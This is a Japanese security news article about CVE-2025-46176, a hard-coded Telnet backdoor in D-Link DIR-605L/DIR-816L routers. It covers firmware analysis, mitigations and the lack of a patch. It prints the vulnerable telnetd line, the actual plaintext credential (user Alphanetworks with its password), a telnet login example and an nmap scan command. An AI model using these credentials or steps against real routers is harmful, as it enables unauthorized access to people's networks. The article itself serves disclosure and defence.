D-Link Router の脆弱性 CVE-2025-46176:ハードコードされた Telnet 認証情報

D-Link Routers Exposed by Hard-Coded Telnet Credential

2025/05/26 gbhackers — 先日に公開された D-Link の DIR-605L/DIR-816L ルーターの深刻な脆弱性 CVE-2025-46176 は、ハードコードされた Telnet 認証情報を悪用する攻撃者に、リモート・コマンド実行を許すものである。この脆弱性が影響を及ぼす範囲は、ファームウェア・バージョン 2.13B01 (DIR-605L)/2.06B01 (DIR-816L) であり、深刻度は CVSS v3.1:6.5 (Medium) と評価されている。セキュリティ研究者たちの指摘は、不適切なコマンド無効化 (CWE-77) に原因があり、ファームウェアを解析する攻撃者は、認証回避の可能性を得るというものだ。

ファームウェア・バックドアの技術分析

研究者たちは binwalk を用いてファームウェアを抽出し、脆弱なコンポーネントを取り込んだ SquashFS ファイル・システムを発見した。DIR-605L/DIR-816L は、ハードコードされた認証情報で初期化する “./bin/telnetd.sh” を介して Telnet サービスを実行する。

bash# DIR-605L v2.13B01 telnetd.sh snippet
/usr/sbin/telnetd -l /bin/sh -u Alphanetworks:$image_sign

上記の $image_sign 変数は “./etc/alpha_config/image_sign” から認証情報を取得し、Wj5eH%JC のような平文のパスワードを公開する。

以下の方法により攻撃者は、この脆弱性を悪用できる。

bashtelnet 192.168.0.1
Username: Alphanetworks
Password: Wj5eH%JC

研究者たちによるファームウェア分析スクリプトは、以下のコマンドを使用して、この脆弱性を特定した。

bashbinwalk -eM DIR605L_FW_2.13B01.bin
grep -r "Alphanetworks" squashfs-root
cat squashfs-root/etc/alpha_config/image_sign
悪用される可能性とリスク評価

この脆弱性により、未認証の攻撃者は、以下の操作を実行できる。

  • Telnet 経由による任意のコマンド実行
  • ルーター・コンフィグレーションの変更
  • マルウェアの展開および、内部ネットワークへの侵入

EPSS スコアは 0.04% であり、実際に悪用される可能性は低いとされるが、依然として高リスクの脆弱性だと認識すべきだ。

さらに、ファームウェア・パッチが提供されていないため、パブリック・ネットワークに公開されているデバイスのリスクは増大する。

セキュリティ・アナリストは以下の点を強調している。

bashnmap -p 23 <target_IP>  # Identifies vulnerable Telnet services
緩和策とベンダーの対応

この問題をセキュリティ情報で認めた D-Link は、ユーザーに対して以下の対策を促している

  • 管理インターフェースから Telnet サービスを無効化
  • 管理ポートへの WAN アクセスを制限
  • ファームウェア更新の監視

2025年5月末の時点で、公式パッチは存在しない。一時的な回避策として、以下が提示されている。

bashiptables -A INPUT -p tcp --dport 23 -j DROP  # Blocks Telnet traffic

この脆弱性が浮き乗りにするのは、IoT デバイスにおける、特にアップデート・サポートが限られているレガシー・モデルにおける、ハードコードされた認証情報のリスクである。

ネットワーク管理者にとって必要なことは、product:”DIR-605L” のなどの Shodan クエリを使用してデバイスを監査し、ネットワーク・セグメンテーションを実装することだ。

D-Link DIR-605L/DIR-816L に RCE 脆弱性とのことですが、現時点ではパッチが存在しないとのことです。当該製品をご利用のチームは、文中の回避策を、ご参照ください。よろしければ、D-Link で検索Router で検索も、ご利用ください。